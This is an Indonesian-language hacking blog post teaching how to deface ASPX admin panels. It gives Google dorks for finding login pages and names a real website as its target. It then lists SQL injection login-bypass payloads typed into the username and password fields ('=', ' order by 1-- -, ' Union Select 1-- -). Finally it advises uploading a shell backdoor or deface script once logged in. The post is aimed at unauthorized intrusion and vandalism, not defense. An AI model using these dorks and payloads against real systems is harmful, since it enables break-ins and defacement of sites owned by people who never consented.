Tutorial deface bypass aspx admin panel

Welcome back all!!
Kali ini gua mau memberikan tutorial cara def4ce bypass aspx admin panel..
Sebenarnya ini metode udah lama banget, tapi jarang banget diketahui orang dan palingan banyak yang fresh ya..

Langsung aja gaskeunn!!!

• Alat & Bahan

- HP/PC

- Dork

inurl:/admin-login.aspx

inurl:/admin/login.aspx
inurl:adminlogin.aspx
inurl:adminlogin.aspx
inurl:login.aspx
inurl:admin/add_admin.asp
inurl:admin/addadmin.asp
inurl:admin/addarticle.asp
inurl:admin/addcat.asp
inurl:admin/addfile.asp
inurl:admin/addinfo.asp
inurl:admin/addjob.asp
inurl:admin/addmember.asp
inurl:admin/addnews.asp
inurl:admin/addproduct.asp
inurl:admin/adminuser.asp
inurl:admin/cp.asp
inurl:admin/gallery.asp
inurl:admin/image.asp
inurl:admin/productadd.asp
inurl:admin/productshow.asp
inurl:admin/upload.asp
inurl:admin/user.asp

- Shell backdoor

- Script deface

- Otak yang jalan :v

• Tutorial

• Kalian dork dulu lah kek biasanya sampe nemu target.

• Gua nemuin nih target http://www.pharmadocx.com lalu kalian coba vuln atau kaga. Bagaimana caranya? Kalian isi user & pass nya dengan ini '=' seperti gambar dibawah.

• Jika seperti ini (lihat bawah) maka itu vuln

• Kembali ke form login tadi, dan coba masukin user & pass dengan ini

' order by 1-- -

Nah, jika seperti ini berarti belom dapet nih

• Sekarang kita coba isi 

' order by 2-- -

Dan, hasil.. Error seperti saat memasukkan user & pass '=' tadi..

• Nah error di angka 2 jadi isi user & passnya

' Union Select 1-- -

Dann, duarr!! Berhasil wkwk :v

Tapi.. Nasib sedih di gua :'( tu web gabisa di apa-apain lagi sesudah itu :v intinya gini kalo udah berhasil login ya kalian carilah tempat upload apapun itu untuk upload shell, jika gabisa up shell, ya udh JSO aja..

Sekian dulu gan postingan kali ini.. sampai jumpa next post!!

Any Problem? Click